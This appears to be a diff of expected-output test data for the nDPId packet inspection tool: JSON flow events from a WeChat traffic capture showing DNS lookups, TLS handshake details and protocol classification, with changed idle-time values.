+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167749276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1492167765155,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765155,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8EUFAAEARpLrAqAFnwKgB\/uvEADUAKLhvU\/MBAAABAAAAAAAAA3dlYgZ3ZWNoYXQDY29tAAABAAE="} 00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1492167765432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":391,"pkt_l4_len":357,"thread_ts_msec":1492167765432,"pkt":"eJKcD6iO8IQvSpdgCABFoAF5AABAAEARtB7AqAH+wKgBZwA168QBZQj\/U\/OBgAABAAMABAALA3dlYgZ3ZWNoYXQDY29tAAABAAHADAAFAAEAAAJYAAcEd2ViMcAQwCwAAQABAAACWAAEy82Tq8AsAAEAAQAAAlgABMvNl6LALAACAAEAAU8CAA0HbnMtdGVsMQJxccAXwCwAAgABAAFPAgAKB25zLWNuYzHAZ8AsAAIAAQABTwIACQZucy1vczHAZ8AsAAIAAQABTwIACgducy1jbW4xwGfAjgABAAEAAAFuAAS4ac55wI4AAQABAAABbgAEy82TmMCOAAEAAQAAAW4ABMvNsDrAjgABAAEAAAFuAARnBx7vwKMAAQABAAANPgAEtv5vZMCjAAEAAQAADT4ABLfoeDvAowABAAEAAA0+AAS2\/hBmwHgAAQABAAABmAAEb6Frw8B4AAEAAQAAAZgABG+haBHAXwABAAEAAAFuAAS2jLiMwF8AAQABAAABbgAEtwK6mQ=="} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1492167765432,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.147.171"}} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765433,"flow_last_seen":1492167765433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765433,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1492167765433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765433,"pkt":"8IQvSpdgeJKcD6iOCABFAAA88RZAAEAGKB3AqAFny82Tq+K0AbvYTb2iAAAAAKACchDtIAAAAgQFtAQCCAoAMky0AAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765657,"flow_last_seen":1492167765657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765657,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1492167765657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765657,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8ZwNAAEAGsjDAqAFny82Tq+K1Abs3CyvvAAAAAKACchAf3gAAAgQFtAQCCAoAMkzsAAAAAAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1492167765701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765701,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rSlk19z2E29o6ASN8g4AQAAAgQFoAQCCApF8qRxADJMtAEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1492167765701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765701,"pkt":"8IQvSpdgeJKcD6iOCABFAAA08RdAAEAGKCTAqAFny82Tq+K0AbvYTb2jpZNfdIAQAOWdWQAAAQEICgAyTPdF8qRx"} 
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167765433,"flow_last_seen":1492167765701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167765701,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1492167765933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765933,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rU+QocNNwsr8KASN8h9cwAAAgQFoAQCCApFrtG3ADJM7AEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1492167765933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167765933,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZwRAAEAGsjfAqAFny82Tq+K1Abs3CyvwPkKHDoAQAOXiyQAAAQEICgAyTTFFrtG3"} 
-00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167617248,"flow_last_seen":1492167640200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167767276,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167776953,"flow_last_seen":1492167776953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167776953,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1492167776953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167776953,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8k9VAAEAGhV7AqAFny82Tq+K2AbuZa8QhAAAAAKACchAaQgAAAgQFtAQCCAoAMlf0AAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167777204,"flow_last_seen":1492167777204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167777204,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1492167777204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777204,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XvpAAEAGujnAqAFny82Tq+K3Abv08QbJAAAAAKACchB71AAAAgQFtAQCCAoAMlgzAAAAAAEDAwc="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777220,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rYX2Lh9mWvEIqASN8j8PgAAAgQFoAQCCApF00IlADJX9AEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777220,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0k9ZAAEAGhWXAqAFny82Tq+K2AbuZa8QiF9i4foAQAOVhlwAAAQEICgAyWDdF00Il"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1264,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167776953,"flow_last_seen":1492167777221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167777221,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1492167777476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167777476,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74reza+A99PEGyqASN8j\/yAAAAgQFoAQCCApFrtz+ADJYMwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1492167777476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167777476,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XvtAAEAGukDAqAFny82Tq+K3Abv08QbKs2vgPoAQAOVlIAAAAQEICgAyWHdFrtz+"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1268,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1270,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1492167639887,"flow_last_seen":1492167667658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":39199,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1492167782480,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765433,"flow_last_seen":1492167765433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765433,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1492167765433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167765433,"pkt":"8IQvSpdgeJKcD6iOCABFAAA88RZAAEAGKB3AqAFny82Tq+K0AbvYTb2iAAAAAKACchDtIAAAAgQFtAQCCAoAMky0AAAAAAEDAwc="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765657,"flow_last_seen":1492167765657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167765657,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 